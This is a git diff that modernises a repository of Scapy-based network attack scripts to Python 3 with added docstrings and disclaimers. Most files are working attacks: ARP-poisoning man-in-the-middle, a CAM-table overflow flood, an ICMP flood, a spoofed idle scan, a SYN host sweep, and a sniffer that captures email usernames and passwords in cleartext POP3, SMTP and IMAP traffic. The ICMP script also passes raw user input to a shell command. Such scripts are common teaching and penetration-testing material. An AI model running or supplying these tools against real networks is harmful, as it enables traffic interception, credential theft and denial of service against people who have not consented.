diff --git a/3way.py b/3way.py index 28e6aa9..45f35ac 100644 --- a/3way.py +++ b/3way.py @@ -17,4 +17,4 @@ # SEND our ACK-GET request reply,error=sr(ACK) # Print the reply -print reply.show() +print(reply.show()) diff --git a/all_devices_pcap.py b/all_devices_pcap.py index 61a6cba..78db2dc 100644 --- a/all_devices_pcap.py +++ b/all_devices_pcap.py @@ -1,25 +1,79 @@ -from __future__ import print_function -from sys import argv +#!/usr/bin/env python3 +""" +all_devices.py + +This script analyzes a pcap (packet capture) file to extract and print a list of unique IP addresses +present in the captured network traffic. It uses the Scapy library to read and process the packets. +Both source and destination IP addresses are extracted and printed as soon as they are found. + +Usage: + python3 all_devices.py path_to_pcap + +Dependencies: + - Python 3.x + - Scapy (install via: pip install scapy) + +Functionality: + - Reads a pcap file using Scapy's rdpcap function. + - Iterates over each packet and checks for the presence of an IP layer. + - Extracts and prints unique source and destination IP addresses. + - Displays a final list of all unique IP addresses found. +""" + +import sys from scapy.all import rdpcap, IP def help_text(): - print("Usage: python all_devices.py path_to_pcap") - sys.exit() - -def extract_machine_names(pcap): - machines = [] - packets = rdpcap(pcap) - for i in range(len(packets)): - if packets[i][IP].src not in machines: - machines.append(packets[i][IP].src) - print(len(machines), packets[i][IP].src) - elif packets[i][IP].dst not in machines: - machines.append(packets[i][IP].dst) - print(len(machines), packets[i][IP].dst) + """ + Displays the usage instructions for the script and exits the program. + + This function is called when the required pcap file path argument is missing. + """ + print("Usage: python3 all_devices.py path_to_pcap") + sys.exit(1) + +def extract_machine_names(pcap_file): + """ + Extracts unique IP addresses from the provided pcap file. + + Parameters: + pcap_file (str): The file path to the pcap file to analyze. + + Returns: + list: A list of unique IP addresses found in the pcap file. + + Process: + 1. Reads all packets from the given pcap file using rdpcap. + 2. Iterates over each packet and checks if the packet contains an IP layer. + 3. For packets with an IP layer: + - Checks the source IP address; if it is not already in the list, adds it and prints it. + - Checks the destination IP address; if it is not already in the list, adds it and prints it. + """ + machines = [] # List to store unique IP addresses + packets = rdpcap(pcap_file) # Read packets from the provided pcap file + + # Iterate over each packet in the capture file + for packet in packets: + # Ensure the packet contains an IP layer to prevent processing errors + if IP in packet: + # Process the source IP address if it hasn't been encountered before + if packet[IP].src not in machines: + machines.append(packet[IP].src) + print(len(machines), packet[IP].src) + # Process the destination IP address if it hasn't been encountered before + if packet[IP].dst not in machines: + machines.append(packet[IP].dst) + print(len(machines), packet[IP].dst) + return machines if __name__ == '__main__': - pcap = argv[1] - if len(argv) < 2: - help_text() - print("\nList of all the machines in pcap =>", extract_machine_names(pcap),end="\n\n") + # Verify that the user has provided the pcap file path as a command-line argument + if len(sys.argv) < 2: + help_text() # Show help text and exit if no file path is provided + + # The first argument is the path to the pcap file + pcap_file = sys.argv[1] + + # Extract and print the unique IP addresses from the provided pcap file + print("\nList of all the machines in pcap =>", extract_machine_names(pcap_file), "\n") diff --git a/arp_mitm.py b/arp_mitm.py index cec7c64..22e6b81 100644 --- a/arp_mitm.py +++ b/arp_mitm.py @@ -1,65 +1,133 @@ +#!/usr/bin/env python3 +""" +ARP Poisoning MITM Script + +This script performs ARP poisoning to conduct a Man-in-the-Middle (MITM) attack on a local network. +It sends spoofed ARP responses to both the victim and the gateway (router) so that their traffic is +routed through the attacker's machine. + +IMPORTANT: + - This script requires root privileges to run. + - It modifies IP forwarding settings on the system. + - Use responsibly and only on networks you own or have explicit permission to test. + +Usage: + python3 + +The script will prompt for: + - The network interface to use (e.g., eth0) + - Victim's IP address + - Gateway (router) IP address +""" + from scapy.all import * import sys import os import time +# Request user input for the interface, victim IP, and gateway IP. +# In Python 3, use 'input()' instead of 'raw_input()'. try: - interface = raw_input("[*] Enter Desired Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") + interface = input("[*] Enter Desired Interface: ") + victimIP = input("[*] Enter Victim IP: ") + gateIP = input("[*] Enter Router IP: ") except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - sys.exit(1) + # Handle interruption (e.g., user pressing Ctrl+C) gracefully. + print("\n[*] User Requested Shutdown") + print("[*] Exiting...") + sys.exit(1) -print "\n[*] Enabling IP Forwarding...\n" +# Enable IP forwarding to allow the attacker's machine to forward traffic. +print("\n[*] Enabling IP Forwarding...\n") os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") + """ + Retrieves the MAC address for a given IP address via an ARP request. + + Parameters: + IP (str): The target IP address for which the MAC address is requested. + + Returns: + str: The MAC address of the target IP if found. + """ + # Disable verbose output from scapy. + conf.verb = 0 + # Send an ARP request to the broadcast MAC address for the specified IP. + ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=IP), + timeout=2, iface=interface, inter=0.1) + for snd, rcv in ans: + # Return the source MAC address from the received ARP reply. + return rcv.sprintf(r"%Ether.src%") def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - sys.exit(1) + """ + Restores the original ARP configuration on the network. + + This function is called when the attack is interrupted. It sends ARP packets to both + the victim and the gateway to restore their correct MAC-IP mappings, disables IP forwarding, + and exits the script. + """ + print("\n[*] Restoring Targets...") + # Retrieve the actual MAC addresses for the victim and the gateway. + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + # Send ARP responses to restore the correct MAC addresses on both targets. + send(ARP(op=2, pdst=gateIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=7) + send(ARP(op=2, pdst=victimIP, psrc=gateIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateMAC), count=7) + print("[*] Disabling IP Forwarding...") + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print("[*] Shutting Down...") + sys.exit(1) def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + """ + Performs the ARP poisoning by sending spoofed ARP responses to both the victim and the gateway. + + Parameters: + gm (str): Gateway's MAC address. + vm (str): Victim's MAC address. + """ + # Spoof the victim: tell the victim that the gateway IP is at the attacker's MAC. + send(ARP(op=2, pdst=victimIP, psrc=gateIP, hwdst=vm)) + # Spoof the gateway: tell the gateway that the victim IP is at the attacker's MAC. + send(ARP(op=2, pdst=gateIP, psrc=victimIP, hwdst=gm)) def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - sys.exit(1) - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - sys.exit(1) - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break + """ + Main function to perform the ARP poisoning MITM attack. + + It first attempts to obtain the MAC addresses of both the victim and the gateway. If it fails to + retrieve either, it disables IP forwarding and exits. Once both MAC addresses are acquired, it enters + an infinite loop to continuously send spoofed ARP responses. If interrupted, it calls reARP() to restore + the network. + """ + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print("[!] Couldn't Find Victim MAC Address") + print("[!] Exiting...") + sys.exit(1) + + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print("[!] Couldn't Find Gateway MAC Address") + print("[!] Exiting...") + sys.exit(1) + + print("[*] Poisoning Targets...") + # Continuously send spoofed ARP packets every 1.5 seconds. + while True: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + # On interruption, restore the network configuration. + reARP() + break if __name__ == '__main__': mitm() diff --git a/cam_overflow.py b/cam_overflow.py index f6b385d..d20dc15 100644 --- a/cam_overflow.py +++ b/cam_overflow.py @@ -1,34 +1,63 @@ +#!/usr/bin/env python3 +""" +CAM Overflow Attack Script -#-------------------------------------------------------------------------------# -# A script to perform CAM overflow attack on Layer 2 switches # -# Bharath(github.com/yamakira) # -# # -# CAM Table Overflow is all about flooding switches CAM table # -# with a lot of fake MAC addresses to drive the switch into HUB mode. # -#-------------------------------------------------------------------------------# +This script performs a CAM table overflow attack on Layer 2 switches. It works by flooding the +switch's CAM table with a large number of packets containing fake MAC addresses. When the CAM table +overflows, the switch is forced to operate in hub mode, which can be useful for testing network +resilience or security measures. -#!/usr/bin/env python -from scapy.all import Ether, IP, TCP, RandIP, RandMAC, sendp +DISCLAIMER: + This script is for educational purposes only. Unauthorized use on networks you do not own or + have explicit permission to test is illegal and unethical. +Author: Bharath (github.com/yamakira) +""" -#destMAC = "FF:FF:FF:FF:FF:FF" +from scapy.all import Ether, IP, RandIP, RandMAC, sendp -'''Filling packet_list with ten thousand random Ethernet packets - CAM overflow attacks need to be super fast. - For that reason it's better to create a packet list before hand. -''' def generate_packets(): - packet_list = [] #initializing packet_list to hold all the packets - for i in xrange(1,10000): - packet = Ether(src = RandMAC(),dst= RandMAC())/IP(src=RandIP(),dst=RandIP()) + """ + Generate a list of random Ethernet/IP packets for a CAM table overflow attack. + + The function creates 10,000 packets. Each packet includes: + - An Ethernet layer with random source and destination MAC addresses. + - An IP layer with random source and destination IP addresses. + + These packets are intended to rapidly flood the target switch's CAM table. + + Returns: + list: A list containing the generated packets. + """ + packet_list = [] # Initialize a list to hold all the packets. + + # Create 10,000 packets using random MAC and IP addresses. + for i in range(1, 10000): + # Construct an Ethernet/IP packet with random addresses. + packet = Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(), dst=RandIP()) packet_list.append(packet) + + return packet_list def cam_overflow(packet_list): -# sendpfast(packet,iface='tap0', mbps) + """ + Execute the CAM table overflow attack by sending the generated packets. + + This function sends the entire packet list on a specified network interface (here 'tap0'). + This flooding of packets aims to overwhelm the switch's CAM table, causing it to fail and + operate as a hub instead. + + Parameters: + packet_list (list): The list of pre-generated packets to be sent. + """ + # For faster packet sending, consider using sendpfast with an appropriate rate: + # sendpfast(packet_list, iface='tap0', mbps=) + # Here we use sendp to send the packets on interface 'tap0'. sendp(packet_list, iface='tap0') - if __name__ == '__main__': + # Generate the list of packets to be used for the attack. packet_list = generate_packets() + + # Execute the CAM table overflow attack by sending the generated packets. cam_overflow(packet_list) - diff --git a/hd_tcp_syn.py b/hd_tcp_syn.py index ac404ec..811b4c3 100644 --- a/hd_tcp_syn.py +++ b/hd_tcp_syn.py @@ -1,31 +1,60 @@ -#---------------------------------------------------------------------# -# A script to discover live hosts on a network # -# Bharath(github.com/yamakira) # -# # -#---------------------------------------------------------------------# +#!/usr/bin/env python3 +""" +Host Discovery Script using TCP SYN Scan +This script is designed to discover live hosts on a network by sending a TCP SYN +packet to port 80 over a specified network range. If a host responds, it is +considered "alive". This method is useful for network reconnaissance and security +assessments. -from __future__ import print_function # importing print as a function feature(just a best practice) -from scapy.all import IP, TCP, sr1, sr # Importing only the necessary classes from scapy -import sys -import logging #Surpress scapy warnings by logging them -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) +DISCLAIMER: + Use this script only on networks where you have explicit permission to perform + such tests. Unauthorized scanning may be illegal and unethical. + +Author: Bharath (github.com/yamakira) +""" +from scapy.all import IP, TCP, sr # Import only the necessary components from Scapy. +import sys # For command-line argument handling. +import logging # To control logging and suppress unnecessary Scapy warnings. +# Suppress Scapy runtime warnings. +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) def help_text(): + """ + Display usage instructions for the script and exit. + + This function is invoked if the user does not provide the required network range + argument when running the script. + """ print("\nUsage:\n python hd_tcp_syn.py network_range\n") - sys.exit() - + sys.exit(1) + def host_discovery(network_range): - ans,unans=sr( IP(dst=network_range)/TCP(dport=80,flags="S"),verbose=0,timeout=1) - ans.summary( lambda(s,r) : r.sprintf("\n %IP.src% is alive\n") ) - #for packet in ans: - # print (packet.summary) + """ + Discover live hosts within a specified network range. + + This function sends TCP SYN packets to port 80 for every IP address in the provided + network range. Responses indicate that the host is alive, and the source IP is printed. + Parameters: + network_range (str): The target network range in CIDR notation (e.g., "192.168.1.0/24") + """ + # Send TCP SYN packets to the network range and capture responses. + # The sr() function returns a tuple (answered, unanswered). + ans, unans = sr(IP(dst=network_range)/TCP(dport=80, flags="S"), verbose=0, timeout=1) + + # For each answered packet, print the source IP (i.e., the live host). + ans.summary(lambda s, r: r.sprintf("\n %IP.src% is alive\n")) if __name__ == '__main__': + # Check if the required network range argument is provided. if len(sys.argv) < 2: help_text() + + # Retrieve the network range from the command-line arguments. network_range = sys.argv[1] + + # Begin the host discovery process. host_discovery(network_range) diff --git a/icmp_flood.py b/icmp_flood.py index 7ad5237..99cd7ea 100644 --- a/icmp_flood.py +++ b/icmp_flood.py @@ -1,46 +1,58 @@ +#!/usr/bin/env python3 +""" +ICMP Flood Attack Script +This script is designed to perform an ICMP flood attack by leveraging the system's ping command. +It sends a specified number of ICMP echo requests (ping packets) to a target host using a user-defined +packet size. This attack can be used to flood a target with network traffic. -# This is python script for peforming the icmp flood attack +DISCLAIMER: + This script is for educational purposes only. Unauthorized use on networks without explicit + permission is illegal and unethical. -# 789sk.gupta@gmail.com - - - -# icmp_ping for defragmentation of the network packets - - -import os -import sys # system commands exexution module - - -import time -# import socket +Author: 789sk.gupta@gmail.com +""" +import os # Module to interact with the operating system +import sys # Module for system-specific parameters and functions +import time # Module for time-related functions def icmp_startattack(): + """ + Initiates an ICMP flood attack on a target system. + + The function prompts the user for: + - The target system's IP address. + - The size of each ICMP packet (in bytes). + - The number of packets to send. + + It then constructs a system command using the Windows-style ping parameters: + - '-l' specifies the packet size. + - '-n' specifies the number of echo requests. + + Finally, it executes the command to start the attack. + """ + # Prompt the user for the target system's IP address. + hostip = input("Enter target system's IP address: ") + + # Prompt for the packet size; a recommended value is around 65500 bytes. + ippacketData = input("Enter the size of each IP packet (e.g., 65500): ") + + # Prompt for the number of packets to send. + number = input("Enter the number of packets to send: ") + + # Inform the user that the attack is beginning. + print("Attacking the target with crafted ICMP packets") + + # Construct the ping command. + # The command format for Windows is: + # ping [target IP] -l [packet size] -n [number of packets] + command = "ping " + hostip + " -l " + ippacketData + " -n " + number + + # Execute the constructed command using the operating system. + os.system(command) - hostip = raw_input("target system's ip address") - - ippacketData = input("Enter the size of each of the ip packet") - number = input("Enter the number of packets to sent") - # recommended size 65500 which is max available for ip packet - - - print "Attacking the target with crafted icmp packets" - # execution of the attack in the shell - # t = time.time() - os.system("ping" + hostip + "-l" + ippacketData + "-n" + number) - - # os.popen("ping 192.168.43.1 -w 1 -n 2") - - # os command to start attack - # where n points to time b/w per echo request and reply - # and n points to the number of packets with which every icmp request is to be sent to the h - - - -icmp_startattack() # called the main attack execution function - -print "Attack finished" -#temporarily program ends - +# Main execution: start the attack when the script is run directly. +if __name__ == '__main__': + icmp_startattack() # Execute the ICMP flood attack. + print("Attack finished") diff --git a/ipidscanner.py b/ipidscanner.py index c98b57e..b3175fb 100644 --- a/ipidscanner.py +++ b/ipidscanner.py @@ -1,60 +1,116 @@ -#!/usr/bin/env python +#!/usr/bin/env python3 +""" +Idle Scan Script -#---------------------------------------------------------------------# -# A script to perform idle scan i.e. scanning victim through zombie # -# Bharath(github.com/yamakira) # -# More info: http://nmap.org/book/idlescan.html # -#---------------------------------------------------------------------# +This script performs an idle scan to determine the state of a port on a victim host by leveraging +a zombie host. It exploits the predictable IPID sequence of the zombie host to infer whether a port +on the victim is open or closed. For more information on idle scans, see: +http://nmap.org/book/idlescan.html +Author: Bharath (github.com/yamakira) +""" -from __future__ import print_function # importing print as a function feature(just a best practice) -from scapy.all import IP, TCP, sr1, send # Importing only the necessary classes from scapy -import sys -import logging #Surpress scapy warnings by logging them -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) +from scapy.all import IP, TCP, sr1, send # Import required Scapy functions and classes. +import sys # For command-line argument handling. +import logging # To suppress Scapy warnings. +# Suppress Scapy runtime warnings. +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) def help_text(): + """ + Display the correct usage of the script and exit. + + This function is called when the user does not provide the required command-line arguments. + """ print("\nUsage:\n python ipidscanner.py zombie_ip victim_ip victim_port\n") sys.exit() - def ipid_scanner(zombie_ip, victim_ip, victim_port): - - synack_to_zombie = IP(dst=zombie_ip)/TCP(dport=3322, flags='SA') # Creating SYNACK packet. attacker --> zombie - zombie_response = sr1(synack_to_zombie, verbose=0) # Sending SYNACK. attacker --> zombie - print("\n[+] Sending syn-ack to zombie") - initial_ipid = zombie_response.id # Recording the initial IPID value of zombie + """ + Perform the idle scan using the provided zombie and victim details. + + Process: + 1. Sends a SYN-ACK packet to the zombie host and records its initial IPID. + 2. Sends a spoofed SYN packet to the victim, making it appear as if it originated from the zombie. + 3. Sends another SYN-ACK packet to the zombie host and records the final IPID. + + The difference between the initial and final IPID values indicates whether the victim's port is open or closed. + + Parameters: + zombie_ip (str): The IP address of the zombie host. + victim_ip (str): The IP address of the victim host. + victim_port (str/int): The port number on the victim to scan. + + Returns: + tuple: A tuple containing the initial and final IPID values from the zombie. + """ + # Create a SYN-ACK packet to send to the zombie host on port 3322. + synack_to_zombie = IP(dst=zombie_ip) / TCP(dport=3322, flags='SA') + + # Send the SYN-ACK packet to the zombie and capture its response. + zombie_response = sr1(synack_to_zombie, verbose=0) + print("\n[+] Sending SYN-ACK to zombie") + + # Record the initial IPID value from the zombie's response. + initial_ipid = zombie_response.id print("\n[+] Recording initial IPID") - #Creating spoofed SYN packet. Zombie(spoofed) --> victim - syn_to_victim = IP(src = zombie_ip, dst=victim_ip)/TCP(dport=int(victim_port), flags='S') - send(syn_to_victim, verbose=0) # Sending SYN. Zombie(spoofed) --> victim - print("\n[+] Sending spoofed syn to victim") + # Create a spoofed SYN packet from the zombie to the victim. + syn_to_victim = IP(src=zombie_ip, dst=victim_ip) / TCP(dport=int(victim_port), flags='S') - zombie_response = sr1(synack_to_zombie, verbose=0) # Sending SYNACK. Attacker --> Zombie - print("\n[+] Sending syn-ack to zombie") - final_ipid = zombie_response.id # Recording the final IPID value of zombie + # Send the spoofed SYN packet to the victim. + send(syn_to_victim, verbose=0) + print("\n[+] Sending spoofed SYN to victim") + + # Send another SYN-ACK to the zombie to get the updated IPID after the spoofed packet. + zombie_response = sr1(synack_to_zombie, verbose=0) + print("\n[+] Sending SYN-ACK to zombie") + + # Record the final IPID value from the zombie's response. + final_ipid = zombie_response.id print("\n[+] Recording final IPID\n") - - print("[*] Initial IPID of zombie: {}\n[*] Final IPID of zombie: {}".format(initial_ipid,final_ipid)) - return initial_ipid, final_ipid -def check_port_status(initial_ipid, final_ipid): + print("[*] Initial IPID of zombie: {}\n[*] Final IPID of zombie: {}".format(initial_ipid, final_ipid)) + return initial_ipid, final_ipid - if initial_ipid == final_ipid-1: +def check_port_status(initial_ipid, final_ipid, victim_ip, victim_port): + """ + Determine the status of the victim's port based on the change in the zombie's IPID values. + + The logic is as follows: + - If the initial IPID is one less than the final IPID, no extra packet was sent by the zombie, + indicating that the victim's port is closed or filtered. + - If the initial IPID is two less than the final IPID, it implies that an extra packet was sent, + suggesting that the victim's port is open. + - Any other difference suggests that the zombie's IPID sequence is not behaving as expected. + + Parameters: + initial_ipid (int): The initial IPID value recorded from the zombie. + final_ipid (int): The final IPID value recorded from the zombie. + victim_ip (str): The victim's IP address. + victim_port (str/int): The port on the victim being scanned. + """ + # Analyze the difference between IPID values to infer the port status. + if initial_ipid == final_ipid - 1: print("\n[*] The port {} on {} is closed | filtered\n".format(victim_port, victim_ip)) - elif initial_ipid == final_ipid-2: - print("\nThe port {} on {} is open\n".format(victim_port,victim_ip)) + elif initial_ipid == final_ipid - 2: + print("\n[*] The port {} on {} is open\n".format(victim_port, victim_ip)) else: - print("\n{} is a Bad zombie, try another!!\n".format(victim_ip)) + print("\n[*] {} is a Bad zombie, try another!!\n".format(victim_ip)) if __name__ == '__main__': - + # Ensure the script is executed with the correct number of command-line arguments. if len(sys.argv) < 4: help_text() - zombie_ip = sys.argv[1] # Assigning zombie IP, victim IP and victim port values + + # Parse command-line arguments. + zombie_ip = sys.argv[1] victim_ip = sys.argv[2] victim_port = sys.argv[3] - i, f = ipid_scanner(zombie_ip, victim_ip, victim_port) - check_port_status(i,f) + + # Perform the idle scan and record IPID values. + initial_ipid, final_ipid = ipid_scanner(zombie_ip, victim_ip, victim_port) + + # Check and print the port status based on the IPID difference. + check_port_status(initial_ipid, final_ipid, victim_ip, victim_port) diff --git a/ipidseq.py b/ipidseq.py index 65a0e81..079a1bc 100644 --- a/ipidseq.py +++ b/ipidseq.py @@ -1,55 +1,104 @@ +#!/usr/bin/env python3 +""" +A simple script to check the pattern in IPID generation on a target. -#!/usr/bin/env python +This script sends several SYN packets to a target (using TCP port 4444) and records the +IPID values from the responses. It then analyzes these IPID values to determine whether +the target's IPID generation is: + - All zeros + - Constant + - Incremental + - Randomized -#---------------------------------------------------------------------# -# A simple script to check pattern in IPID generation on a target # -# Bharath(github.com/yamakira) # -# More info: http://nmap.org/book/idlescan.html # -#---------------------------------------------------------------------# +For more information, refer to: + http://nmap.org/book/idlescan.html +Author: Bharath (github.com/yamakira) +""" -from __future__ import print_function # importing print as a function feature(just a best practice) -from scapy.all import IP, TCP, sr1 # Importing only the necessary classes from scapy -import sys -import logging #Surpress scapy warnings by logging them +from scapy.all import IP, TCP, sr1 # Import only the necessary functions from scapy. +import sys # For command-line argument handling. +import logging # To suppress unnecessary scapy warnings. + +# Suppress scapy runtime warnings. logging.getLogger("scapy.runtime").setLevel(logging.ERROR) def help_text(): + """ + Display usage instructions and exit the script. + """ print("\nUsage:\n python ipidseq.py target_ip\n") sys.exit() def extract_ipids(target_ip): + """ + Send SYN packets to the target and extract the IPID values from the responses. + + Parameters: + target_ip (str): The IP address of the target. + + Returns: + list: A list of IPID values extracted from the target's responses. + """ print("\nTarget => {}".format(target_ip)) - ip = IP(dst=target_ip) # Define IP layer - tcp = TCP(dport = 4444, flags = 'S') # Define TCP layer - syn_packet = ip/tcp # Stacking IP/TCP to create a SYN packet + + # Define the IP layer with the target's IP address. + ip_layer = IP(dst=target_ip) + + # Define the TCP layer with destination port 4444 and the SYN flag set. + tcp_layer = TCP(dport=4444, flags='S') + + # Combine the IP and TCP layers to form a SYN packet. + syn_packet = ip_layer / tcp_layer - ipids = [] + ipids = [] # List to store the extracted IPID values. print("\n[+] Sending packets to the target") - for i in xrange(5): # Sending 5 SYN packets, Saving the IPID's of reply into a list + + # Send 5 SYN packets and record the IPID from each response. + for i in range(5): response = sr1(syn_packet, verbose=0) ipids.append(response.id) - # print(ipids) + return ipids def check_pattern(ipids): + """ + Analyze the IPID values to determine the pattern of IPID generation. + + Parameters: + ipids (list): A list of IPID values. + + Returns: + str: A description of the IPID generation pattern: + - "all zeros" if all IPID values are 0. + - "constant" if all IPID values are identical. + - "incremental" if each IPID increases by 1. + - "randomized" if none of the above patterns match. + """ print("[+] Analyzing the IPID pattern") - if all(v == 0 for v in ipids): # Checking if all IPID's are zeros + if all(v == 0 for v in ipids): return "all zeros" - elif all(x==y for x, y in zip(ipids, ipids[1:])): # Checking if all IPID's are constant + elif all(x == y for x, y in zip(ipids, ipids[1:])): return "constant" - elif all(y-1==x for x, y in zip(ipids, ipids[1:])): # Checking if all IPID's are incremental + elif all(y - 1 == x for x, y in zip(ipids, ipids[1:])): return "incremental" - else: # If all else fails then it's a random pattern + else: return "randomized" if __name__ == '__main__': - + # Ensure that the target IP is provided as a command-line argument. if len(sys.argv) < 2: help_text() + + # Retrieve the target IP from the command-line arguments. target_ip = sys.argv[1] + + # Extract IPID values from the target. ipids = extract_ipids(target_ip) + + # Analyze the extracted IPID values to determine the generation pattern. ipid_pattern = check_pattern(ipids) - print("[*] IPID generation pattern on {} is {}\n".format(target_ip, ipid_pattern)) + # Display the determined IPID generation pattern. + print("[*] IPID generation pattern on {} is {}\n".format(target_ip, ipid_pattern)) diff --git a/mail_sniffer.py b/mail_sniffer.py index 85d9dae..799d984 100644 --- a/mail_sniffer.py +++ b/mail_sniffer.py @@ -1,13 +1,55 @@ -from scapy.all import * +#!/usr/bin/env python3 +""" +Email Credential Sniffer + +This script uses Scapy to sniff network traffic for potential email credentials. It inspects +TCP packets on ports commonly used by email protocols (POP3 on 110, SMTP on 25, and IMAP on 143) +and searches for the keywords "user" or "pass" within the TCP payload. When a packet matching these +criteria is detected, the script prints the destination IP (assumed to be the email server) and +the payload content. + +DISCLAIMER: + Use this script for educational purposes only. Ensure you have explicit permission to + monitor network traffic on the target network. + +Author: Bharath (github.com/yamakira) +""" + +from scapy.all import sniff, IP, TCP -# our packet callback def packet_callback(packet): - if packet[TCP].payload: - mail_packet = str(packet[TCP].payload) + """ + Callback function invoked for each captured packet. + This function checks if the packet contains a TCP payload and then inspects that payload + for the presence of the keywords "user" or "pass" (case-insensitive). If a match is found, + it prints the destination IP address and the payload content. + + Parameters: + packet: The network packet captured by Scapy's sniffer. + """ + # Ensure the packet has a TCP layer and a non-empty payload. + if packet.haslayer(TCP) and packet[TCP].payload: + # Convert the TCP payload to a string. + mail_packet = str(packet[TCP].payload) + + # Check if the payload contains the keywords "user" or "pass" (case-insensitive). if "user" in mail_packet.lower() or "pass" in mail_packet.lower(): - print "[*] Server: %s" % packet[IP].dst - print "[*] %s" % packet[TCP].payload + print("[*] Server: %s" % packet[IP].dst) + print("[*] %s" % packet[TCP].payload) + +def main(): + """ + Starts the packet sniffer with a specified filter. + + The sniffer listens for TCP traffic on ports 110, 25, or 143, which are commonly associated with + email services. Each packet is passed to the 'packet_callback' function for inspection. + """ + # Define a BPF (Berkeley Packet Filter) to capture TCP traffic on ports 110, 25, or 143. + filter_str = "tcp port 110 or tcp port 25 or tcp port 143" + + # Start sniffing packets using the defined filter and callback function. + sniff(filter=filter_str, prn=packet_callback, store=0) -# fire up our sniffer -sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0) +if __name__ == '__main__': + main()